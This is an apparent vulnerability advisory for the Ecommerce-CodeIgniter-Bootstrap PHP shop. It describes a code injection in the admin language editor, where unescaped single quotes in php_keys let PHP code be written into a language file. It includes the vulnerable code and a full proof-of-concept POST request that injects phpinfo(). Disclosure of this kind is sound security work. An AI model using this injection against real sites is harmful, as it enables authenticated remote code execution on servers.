vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)
version: before Vulnerability fixes from Lion Tree · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e (github.com)
A code injection(CWE-94) vulnerability is in application/modules/admin/controllers/advanced_settings/Languages.php
.
In the saveLanguageFiles
method, the element of $_POST['php_keys']
is escaped by htmlentities
and enclosed in two single
quotes as the key of $lang
. However, htmlentities doesn't escape '
, which allows the attacker to escape from single quotes and inject malicious PHP code, leading to authenticated remote code execution.
private function saveLanguageFiles()
{
$i = 0;
$prevFile = 'none';
$phpFileInclude = "<?php \n";
foreach ($_POST['php_files'] as $phpFile) {
if ($phpFile != $prevFile && $i > 0) {
savefile($prevFile, $phpFileInclude);
$phpFileInclude = "<?php \n";
}
$php_value = str_replace("'", ''', $_POST['php_values'][$i]);
$php_value = str_replace('"', '"', $php_value);
$phpFileInclude .= '$lang[\'' . htmlentities($_POST['php_keys'][$i]) . '\'] = \'' . $php_value . '\';' . "\n";
$prevFile = $phpFile;
$i++;
}
savefile($phpFile, $phpFileInclude);
......
function savefile($file, $info)
{
$file = fopen($file, "w");
fwrite($file, $info);
fclose($file);
}
The steps to reproduce are as follows:
POST /Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=english HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 39539
Origin: http://localhost
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=english
Cookie: ci_session=s42mnne1b8qtto2hfi675l8ej6a34me2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
goDaddyGo=&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D='.phpinfo().'&php_values%5B%5D=Home&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=production&php_values%5B%5D=Production&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=pass_change&php_values%5B%5D=Pass+Change&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=security&php_values%5B%5D=Security&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=changed&php_values%5B%5D=Changed&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=change_my_password
......
The application/language/english/admin_lang.php
will be:
<?php
$lang[''.phpinfo().''] = 'Home';
$lang['production'] = 'Production';
......
visit http://localhost/Ecommerce-CodeIgniter-Bootstrap/index.php/admin/languages
again and phpinfo()
will be executed.